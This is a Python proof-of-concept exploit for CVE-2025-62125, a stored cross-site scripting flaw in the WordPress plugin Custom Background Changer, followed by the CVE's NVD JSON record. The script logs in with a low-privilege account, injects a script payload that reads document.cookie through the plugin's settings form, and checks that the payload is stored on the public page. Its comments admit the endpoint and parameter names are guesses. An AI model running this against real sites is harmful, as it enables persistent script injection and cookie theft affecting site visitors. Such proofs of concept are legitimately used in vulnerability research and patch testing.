CVE-2025-62125

import requests import sys from urllib.parse import quote # CVE-2025-62125 PoC - Stored XSS in Custom Background Changer # Target: WordPress site with vulnerable Custom Background Changer plugin (<=3.0) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" # Low-privilege user account PASSWORD = "password" XSS_PAYLOAD = "<script>alert(document.cookie)</script>" def exploit_stored_xss(): """ Exploit the stored XSS vulnerability in Custom Background Changer plugin This PoC demonstrates how an attacker with low privileges can inject malicious JavaScript code that will be stored and executed for all visitors """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Inject XSS payload via plugin settings # The exact endpoint depends on plugin implementation # Common WordPress admin interface: wp-admin/admin.php?page=custom-background-changer admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=custom-background-changer" # XSS payload injection (actual parameter names may vary) exploit_data = { 'background_url': XSS_PAYLOAD, 'submit': 'Save Changes' } response = session.post(admin_url, data=exploit_data) # Step 3: Verify XSS is stored # Visit page where background changer content is displayed public_page = f"{TARGET_URL}/" response = session.get(public_page) if XSS_PAYLOAD in response.text: print("[+] XSS payload successfully stored!") print(f"[+] Payload will execute when users visit affected pages") print(f"[+] Payload URL encoded: {quote(XSS_PAYLOAD)}") return True else: print("[-] XSS payload not found - may require manual verification") return False if __name__ == "__main__": print("CVE-2025-62125 - Custom Background Changer Stored XSS PoC") print("=" * 60) exploit_stored_xss()

{"cve": {"id": "CVE-2025-62125", "sourceIdentifier": "[email protected]", "published": "2025-12-31T13:15:41.650", "lastModified": "2026-04-23T15:34:35.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Gangrade Custom Background Changer custom-background-changer allows Stored XSS.This issue affects Custom Background Changer: from n/a through <= 3.0."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en Anshul Gangrade Custom Background Changer custom-background-changer permite XSS Almacenado. Este problema afecta a Custom Background Changer: desde n/a hasta 3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/custom-background-changer/vulnerability/wordpress-custom-background-changer-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}